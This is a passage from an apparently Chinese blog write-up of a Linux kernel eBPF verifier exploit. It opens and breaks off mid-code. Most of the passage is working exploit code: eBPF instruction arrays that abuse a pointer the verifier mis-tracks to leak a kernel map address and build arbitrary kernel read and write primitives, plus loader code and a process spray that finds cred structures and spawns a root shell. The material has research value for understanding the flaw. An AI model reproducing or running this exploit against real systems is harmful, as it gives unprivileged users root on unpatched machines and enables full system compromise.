class="line">BPF_MOV64_REG(BPF_REG_3, BPF_REG_10)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, <span class="number">-16</span>)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_4, BPF_REG_7)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_5, <span class="number">1</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_skb_load_bytes_relative)</span><br></pre></td></tr></table></figure>
<p>将栈上的 array 指针取出,并减去 0xE0 ,与前面对应,结果保存进 r6 。一加一减,verifier会认为 r6 仍为 array 指针,即等于 0xFFFF…10 。而实际上,r6 等于 0xFFFF…10 - 0xE0 。这里可以选择加减 0x10 ~ 0xE0 ,选择 0xE0 泄露的数据较多。接着,将 r6 所指向的 PAGE_SIZE 字节数据复制到 array 指针处,实现信息泄露。调试发现,泄露的数据中就包含 array 指针,在 0xFFFF…10 - 0x50 处。</p>
<p><img src="images/03.jpg" alt></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r6 = *(u64 *)(r10 - 8) - 0xE0</span></span><br><span class="line">BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, <span class="number">-8</span>)</span><br><span class="line">BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, <span class="number">0xE0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将r6所指向的4096字节数据写入array map,实现信息泄露。</span></span><br><span class="line"><span class="comment">// 调试发现,r6+0xa0处为array map的地址。</span></span><br><span class="line"><span class="comment">// map_update_elem(ctx->comm_fd, 0, r6, 0)</span></span><br><span class="line">BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_2, BPF_REG_8)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_3, BPF_REG_6)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_4, <span class="number">0</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_update_elem)</span><br></pre></td></tr></table></figure>
<p>构造好程序后,就可将其加载进内核,attach 到 socket 上,向 socket 写入全零数据以覆盖栈上的 array 指针,再从 array map 中获取泄露的数据,从中找出 array 指针。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, <span class="keyword">sizeof</span>(insn) / <span class="keyword">sizeof</span>(insn[<span class="number">0</span>]), <span class="string">""</span>);</span><br><span class="line"><span class="keyword">if</span> (prog < <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not load program(do_leak):\n %s"</span>, bpf_log_buf);</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> err = bpf_prog_skb_run(prog, ctx->bytes, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (err != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not run program(do_leak): %d (%s)"</span>, err, strerror(err));</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> key = <span class="number">0</span>;</span><br><span class="line">err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);</span><br><span class="line"><span class="keyword">if</span> (err != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not lookup comm map: %d (%s)"</span>, err, strerror(err));</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">u64 array_map = (u64)ctx->ptrs[<span class="number">20</span>] & (~<span class="number">0xFF</span>L);</span><br><span class="line"><span class="keyword">if</span> ((array_map&<span class="number">0xFFFFF00000000000</span>) != <span class="number">0xFFFF800000000000</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not leak array map: got %p"</span>, (<span class="keyword">kaddr_t</span>)array_map);</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> __always_inline <span class="keyword">int</span></span><br><span class="line">bpf_prog_skb_run(<span class="keyword">int</span> prog_fd, <span class="keyword">const</span> <span class="keyword">void</span> *data, <span class="keyword">size_t</span> <span class="built_in">size</span>)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">int</span> err, socks[<span class="number">2</span>] = {};</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (socketpair(AF_UNIX, SOCK_DGRAM, <span class="number">0</span>, socks) != <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">return</span> errno;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (setsockopt(socks[<span class="number">0</span>], SOL_SOCKET, SO_ATTACH_BPF,</span><br><span class="line"> &prog_fd, <span class="keyword">sizeof</span>(prog_fd)) != <span class="number">0</span>)</span><br><span class="line"> {</span><br><span class="line"> err = errno;</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">write</span>(socks[<span class="number">1</span>], data, <span class="built_in">size</span>) != <span class="built_in">size</span>)</span><br><span class="line"> {</span><br><span class="line"> err = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">goto</span> <span class="built_in">abort</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> err = <span class="number">0</span>;</span><br><span class="line"> </span><br><span class="line"><span class="built_in">abort</span>:</span><br><span class="line"> <span class="built_in">close</span>(socks[<span class="number">0</span>]);</span><br><span class="line"> <span class="built_in">close</span>(socks[<span class="number">1</span>]);</span><br><span class="line"> <span class="keyword">return</span> err;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h3 id="4-3-构造任意读、写原语"><a href="#4-3-构造任意读、写原语" class="headerlink" title="4.3 构造任意读、写原语"></a>4.3 构造任意读、写原语</h3><p>接下来构造的 eBPF 程序和上一程序及其类似,因此通过添加注释的方式进行说明。</p>
<p>实现任意读原语的 eBPF 程序:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">bpf_insn</span> <span class="title">arbitrary_read</span>[] = {</span></span><br><span class="line"> <span class="comment">// 保存r1,r1被内核初始化为指向skb的指针。</span></span><br><span class="line"> <span class="comment">// r9 = r1</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 获取array指针,r0类型为PTR_TO_MAP_VALUE_OR_NULL。</span></span><br><span class="line"> <span class="comment">// r0 = bpf_lookup_elem(ctx->comm_fd, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),</span><br><span class="line"> BPF_ST_MEM(BPF_DW, BPF_REG_10, <span class="number">-8</span>, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, <span class="number">-4</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_lookup_elem),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 必需的判断,令false分支的r0变成PTR_TO_MAP_VALUE类型。</span></span><br><span class="line"> <span class="comment">// if (r0 == NULL) exit(1)</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">1</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 将array指针保存进r8。</span></span><br><span class="line"> <span class="comment">// r8 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 获取PTR_TO_MEM_OR_NULL类型指针,保存在r0。</span></span><br><span class="line"> <span class="comment">// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_3, <span class="number">0x00</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_reserve),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 复制PTR_TO_MEM_OR_NULL类型指针,副本保存在r1。</span></span><br><span class="line"> <span class="comment">// r1 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> <span class="comment">// r1 = r1 + 1</span></span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, <span class="number">1</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 不可能发生。ringbuf的大小虽然为PAGE_SIZE,但其中一部分用于存储关于ringbuf的结构体,剩下的才用于存储数据。</span></span><br><span class="line"> <span class="comment">// 因此,请求保留PAGE_SIZE的内存不可能实现。</span></span><br><span class="line"> <span class="comment">// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, <span class="number">0</span>, <span class="number">5</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_discard),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">2</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 经过上面的NULL检查后,verifier认为r0=0。</span></span><br><span class="line"> <span class="comment">// 由于r1是由r0派生出来的,因此verifier也会认为r1=0。但实际上,r1=1。</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// r7 = (r1 + 1) * 8</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, <span class="number">1</span>),</span><br><span class="line"> BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, <span class="number">8</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// verifier认为r7=8,但实际上r7=16。</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// 调试发现array指针都是0xFFFF..........10</span></span><br><span class="line"> <span class="comment">// 将该指针保存到r10-8处</span></span><br><span class="line"> <span class="comment">// *(u64 *)(r10 - 8) = r8</span></span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, <span class="number">-8</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 向r10-16写入r7=16个字节,覆盖r10-8处的array指针。</span></span><br><span class="line"> <span class="comment">// 写入字节为可控,可将array指针改成任意地址。</span></span><br><span class="line"> <span class="comment">// r0 = bpf_skb_load_bytes_relative(r9, 0, r10-16, r7, 0)</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, <span class="number">-16</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_5, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_skb_load_bytes_relative),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 获取修改后的指针。</span></span><br><span class="line"> <span class="comment">// r6 = *(u64 *)(r10 - 8)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, <span class="number">-8</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 获取修改后指针所指向的8个字节数据,实现任意读。</span></span><br><span class="line"> <span class="comment">// 之所以可以读取成功,是因为verifier以为该指针仍为array指针。</span></span><br><span class="line"> <span class="comment">// r0 = *(u64 *)(r6 + 0)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, <span class="number">0</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 将读取的数据写入array map传回用户态。</span></span><br><span class="line"> <span class="comment">// *(u64 *)(r8 + 0) = r0</span></span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, <span class="number">0</span>),</span><br><span class="line"></span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">0</span>),</span><br><span class="line"> BPF_EXIT_INSN()</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>实现任意写原语的 eBPF 程序:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">bpf_insn</span> <span class="title">arbitrary_write</span>[] = {</span></span><br><span class="line"> <span class="comment">// 保存r1,r1被内核初始化为指向skb的指针。</span></span><br><span class="line"> <span class="comment">// r9 = r1</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 获取array指针,r0类型为PTR_TO_MAP_VALUE_OR_NULL。</span></span><br><span class="line"> <span class="comment">// r0 = bpf_lookup_elem(ctx->comm_fd, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),</span><br><span class="line"> BPF_ST_MEM(BPF_DW, BPF_REG_10, <span class="number">-8</span>, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, <span class="number">-4</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_lookup_elem),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 必需的判断,令false分支的r0变成PTR_TO_MAP_VALUE类型。</span></span><br><span class="line"> <span class="comment">// if (r0 == NULL) exit(1)</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">1</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 将array指针保存进r8。</span></span><br><span class="line"> <span class="comment">// r8 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 获取PTR_TO_MEM_OR_NULL类型指针,保存在r0。</span></span><br><span class="line"> <span class="comment">// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_3, <span class="number">0x00</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_reserve),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 复制PTR_TO_MEM_OR_NULL类型指针,副本保存在r1。</span></span><br><span class="line"> <span class="comment">// r1 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> <span class="comment">// r1 = r1 + 1</span></span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, <span class="number">1</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 不可能发生。ringbuf的大小虽然为PAGE_SIZE,但其中一部分用于存储关于ringbuf的结构体,剩下的才用于存储数据。</span></span><br><span class="line"> <span class="comment">// 因此,请求保留PAGE_SIZE的内存不可能实现。</span></span><br><span class="line"> <span class="comment">// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, <span class="number">0</span>, <span class="number">5</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_discard),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">2</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 经过上面的NULL检查后,verifier认为r0=0。</span></span><br><span class="line"> <span class="comment">// 由于r1是由r0派生出来的,因此verifier也会认为r1=0。但实际上,r1=1。</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// r7 = (r1 + 1) * 8</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, <span class="number">1</span>),</span><br><span class="line"> BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, <span class="number">8</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// verifier认为r7=8,但实际上r7=16。</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// 调试发现array指针都是0xFFFF..........10</span></span><br><span class="line"> <span class="comment">// 将该指针保存到r10-8处</span></span><br><span class="line"> <span class="comment">// *(u64 *)(r10 - 8) = r8</span></span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, <span class="number">-8</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 向r10-16写入r7=16个字节,覆盖r10-8处的array指针。</span></span><br><span class="line"> <span class="comment">// 写入字节为可控,可将array指针改成任意地址。</span></span><br><span class="line"> <span class="comment">// r0 = bpf_skb_load_bytes_relative(r9, 0, r10-16, r7, 0)</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, <span class="number">-16</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_5, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_skb_load_bytes_relative),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 获取修改后的指针。</span></span><br><span class="line"> <span class="comment">// r6 = *(u64 *)(r10 - 8)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, <span class="number">-8</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 从array map中获取从用户态传入的数据。</span></span><br><span class="line"> <span class="comment">// r0决定写入8字节还是4字节,r1则为写入的值。</span></span><br><span class="line"> <span class="comment">// r0 = *(u64 *)(r8 + 8)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, <span class="number">0</span>),</span><br><span class="line"> <span class="comment">// r1 = *(u64 *)(r8 + 8)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, <span class="number">8</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 实现任意写。</span></span><br><span class="line"> <span class="comment">// 之所以可以写入成功,是因为verifier以为r6仍为array指针。</span></span><br><span class="line"> <span class="comment">// if (r0 == 0) { *(u64*)r6 = r1 }</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>),</span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, <span class="number">0</span>),</span><br><span class="line"> BPF_JMP_IMM(BPF_JA, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>),</span><br><span class="line"> <span class="comment">// else { *(u32*)r6 = r1 }</span></span><br><span class="line"> BPF_STX_MEM(BPF_W, BPF_REG_6, BPF_REG_1, <span class="number">0</span>),</span><br><span class="line"></span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">0</span>),</span><br><span class="line"> BPF_EXIT_INSN()</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<h3 id="4-4-定位进程cred"><a href="#4-4-定位进程cred" class="headerlink" title="4.4 定位进程cred"></a>4.4 定位进程cred</h3><p>调试发现,进程的 cred 有一定概率在泄露的 array 指针之后。因此需要多创建几个进程,避免利用失败。</p>
<p>所有进程通过 prctl(PR_SET_NAME, __ID__, 0, 0, 0) 将进程名称设置为固定字符串,在此使用 SCSLSCSL 。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">spawn_processes</span><span class="params">(<span class="keyword">context_t</span> *ctx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < PROC_NUM; i++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">pid_t</span> child = fork();</span><br><span class="line"> <span class="keyword">if</span> (child == <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">if</span> (prctl(PR_SET_NAME, __ID__, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not set name"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">uid_t</span> old = getuid();</span><br><span class="line"> kill(getpid(), SIGSTOP);</span><br><span class="line"> <span class="keyword">uid_t</span> uid = getuid();</span><br><span class="line"> <span class="keyword">if</span> (uid == <span class="number">0</span> && old != uid) {</span><br><span class="line"> OKF(<span class="string">"Enjoy root!"</span>);</span><br><span class="line"> system(<span class="string">"/bin/sh"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">exit</span>(uid);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (child < <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> child;</span><br><span class="line"> }</span><br><span class="line"> 